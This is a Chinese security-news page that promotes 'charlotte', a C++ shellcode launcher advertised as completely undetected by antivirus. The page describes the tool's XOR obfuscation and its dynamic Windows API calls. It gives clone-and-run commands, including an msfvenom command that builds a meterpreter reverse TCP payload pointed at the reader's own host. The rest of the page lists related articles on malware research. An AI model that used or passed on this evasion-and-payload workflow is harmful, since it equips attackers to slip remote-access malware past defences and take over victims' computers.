完全未被检测到的shellcode启动器

VSole2023-06-30 15:07:29

2021年5月13日：

c++ shellcode启动器，截至2021年5月13日，0/26完全未被检测到。
win32 api函数的动态调用
shellcode和函数名的异或加密
每次运行随机XOR键和变量
在KaliLinux上，只需'apt-get install mingw-w64*'就可以了！

2021年5月17日：

随机字符串长度和XOR键长度

使用

git clone存储库，生成命名为beacon.bin的shellcode文件，然后运行charlotte.py

注：使用msfvenom -p测试以及CobaltStrike原始格式Payload！

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py

下载地址

https://github.com/9emin1/charlotte

撤稿纠错

本作品采用《CC 协议》，转载必须注明作者和本文链接

完全未被检测到的shellcode启动器

2023-06-30 15:07:29

2021年5月13日：c++ shellcode启动器，截至2021年5月13日，0/26完全未被检测到。在KaliLinux上，只需'apt-get install mingw-w64*'就可以了！使用git clone存储库，生成命名为beacon.bin的shellcode文件，然后运行charlotte.py注：使用msfvenom -p测试以及CobaltStrike原始格式Payload！

渗透测试工具收集整理

2021-12-29 06:25:20

渗透测试工具收集整理

揭秘恶意软件的罕见感染方式

2023-04-24 10:22:31

恶意软件开发人员正在不断更新他们的传播方式。然而，正如CLoader所证实的那样，这是一种不容忽视的感染方法。CLoader于2022年4月首次被发现。用于签署恶意软件的证书很可能被盗。在整个活动过程中，受感染的受害者总数约为80人。在2022年第四季度，共发现来自超过2000个唯一IP地址的112,000个RapperBot感染尝试。

StripedFly：揭开恶意软件常年隐身的秘密

2023-11-22 11:49:05

作为一个加密货币挖矿软件，StripedFly常年隐藏在一个支持Linux和Windows的复杂模块化框架后面。

卡巴斯基：2023年第二季度IT威胁演变

2023-09-08 14:29:17

今年早些时候，受欢迎的VoIP程序3CXDesktopApp的木马化版本被用于“套娃式”供应链攻击。攻击者能够将恶意代码嵌入到libffmpeg媒体处理库中，以便从他们的服务器下载有效负载。

用 Speakeasy 模拟恶意 Shellcode

2020-08-27 10:13:03

为了能够大规模仿真恶意软件样本，我们通过Speakeasy仿真框架。Speakeasy旨在使非恶意软件分析人员的用户能够尽可能轻松地自动获取分类报告，并使工程师能够编写自定义插件来分类恶意软件。 Speakeasy最初是为了模拟...

LockBit Ransomware Group 利用 BlackMatter 功能增强了其最新变体 LockBit 3.0

2022-07-25 00:00:00

2022 年 3 月，也就是 LockBit 2.0首次出现不到一年后，研究人员发现了即将推出的 LockBit勒索软件新变种。 LockBit 3.0，又名 “LockBit Black”，要到 6 月下旬才会发布，这与该组织新的泄密站点和漏洞赏金计划的推出相吻合。此后，一位研究人员分享了 LockBit 3.0 的样本，以及他对新变体的初步分析。

端点安全系统针对APT攻击的实证评估（上）

2022-04-24 06:45:43

本次工作中，我们利用各种不同的攻击场景评估EDR和其他端点安全方案在APT检测及阻止方面的效率。但无论如何这项工作不应作为任何特定EDR方案的安全投资指南。事实上，定制EDR规则可能会显著改变他们的作用。由于并不只依靠特征值，所以EDR也能够检测未知威胁，并在产生破坏之前阻止他们。

端点安全系统针对APT攻击的实证评估

2022-05-03 07:11:30

然而，需要注意HTA攻击被阻止，是因为阻止了所有HTA文件的策略。EXE和DLL攻击都成功执行，没有发现，也没有产生任何遥测。在McAfee工程师协助下，策略配置成最佳安全。在HTA攻击中，检测到低报警，但没有阻止。

CosmicStrand：发现复杂的 UEFI 固件 rootkit

2022-08-06 11:17:34

Rootkit 是植入操作系统最深处的c。尽管在纸面上它们似乎对攻击者很有吸引力，但创建它们会带来重大的技术挑战，并且最轻微的编程错误都有可能使受害计算机完全崩溃。

VSole

网络安全专家